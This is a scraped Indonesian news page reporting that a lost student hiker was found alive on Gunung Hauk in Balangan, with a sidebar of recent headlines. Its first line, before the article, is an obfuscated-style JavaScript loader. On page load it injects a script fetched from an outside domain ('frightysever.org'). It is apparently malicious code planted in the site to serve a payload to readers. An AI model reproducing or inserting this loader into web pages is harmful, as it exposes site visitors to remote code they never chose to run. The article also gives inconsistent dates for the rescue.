(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Mahasiswa Pendaki Tersesat di Gunung Hauk Ditemukan Selamat


KANALKALIMANTAN.COM, PARINGIN – Tim SAR gabungan berhasil mengevakuasi Umar (26), mahasiswa STIMI Banjarmasin yang tersesat dan hilang di Gunung Hauk, Desa Ajung, Kecamatan Tebing Tinggi, Kabupaten Balangan, akhirnya ditemukan selamat, Kamis (15/7/2022) pukul 15.50 Wita.

Pemuda yang tergabung dalam organisasi Mahasiswa Pecinta Alam (Mapala) STIMI Banjarmasin itu ditemukan selamat dengan keadaan sehat.

Salah satu warga desa Ajung yang ikut melakukan pencarian, Widi mengatakan bahwa tersesatnya Umar disebabkan karena melanggar aturan pendakian di Gunung Hauk.

“Sangkar yang sudah dibatasi di atas, itu diganggunya,” ujar Widi.

 

 

Umar saat berada di Desa Ajung, setelah tersesat di Gunung Hauk, Kamis (14/7/2022). Foto: ist

Baca juga  : Tim KPK Survei Penilaian Integritas di HSU, Ini Kata Pj Sekda

Widi menerangkan kronologi kejadian, saat Latif dan Noval sedang beristirahat kelelahan, Umar tetap melanjutkan perjalanan mendahului rekannya dan akhirnya menghilang.

Umar berhasil memasuki area desa dan akhirnya temukan warga yang pulang dari Desa Nanai.
Menurut laporan Pokdarwis Karang Bintang, tim relawan beserta 9 anggota keluarga Umar dengan total 68 orang dikerahkan berangkat memulai pencarian sekitar pukul 11.50 Wita.

Hingga akhirnya pukul 15.50 Wita, Umar berhasil ditemukan di area Sungai Langkung, yaitu sebuah sungai yang berjarak sekitar dua kilometer dari Desa Batu Ajung.

Selanjutnya bersama warga, Umar langsung dibawa ke Desa Ajung untuk dipulihkan kondisinya. Warga pun menyambut lega akan kedatangan Umar, meskipun terlihat lemas. Dirinya langsung diberi makan dan minum dengan ditemani warga hingga tetua kampung setempat.

 

Warga Desa Ajung saat melakukan pencarian pendaki hilang di Gunung Hauk, Kamis (14/7/2022) pagi.

Baca juga  : Mahasiswa STIMI Banjarmasin Tersesat di Gunung Hauk, Tim SAR Lakukan Pencarian

Sementara itu masyarakat Desa Ujung mengimbau agar para pendaki di Gunung Hauk Balangan selalu mengingat arah tujuan dan selalu memperhatikan sejumlah persyaratannya.

Sebelumnya mahasiswa ini mendaki pada Selasa (12/7/2022) sekitar pukul 14.00 Wita bersama dengan dua orang temannya yaitu Latif dan Noval. Kemudian dirinya dilaporkan belum kembali dari pendakian pada Rabu (13/7/2022) oleh kedua temannya.

Setelah menerima laporan tersebut warga Desa Ajung melakukan penyisiran, namun hingga Kamis (14/7/2022) pukul 08.00 Wita, Umar belum juga ditemukan.

Tim SAR gabungan yang terdiri dari TRC, BPBD Balangan, Basarnas Kabupaten Balangan, Polsek Awayan, Koramil bersama warga lainnya ikut serta melakukan pencarian. (Kanalkalimantan.com/alfi/wanda)

Reporter : alfi/wanda
Editor : bie


Desy Arfianty

Recent Posts

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

6 menit ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

4 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

6 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

7 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

21 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

23 jam ago

This website uses cookies.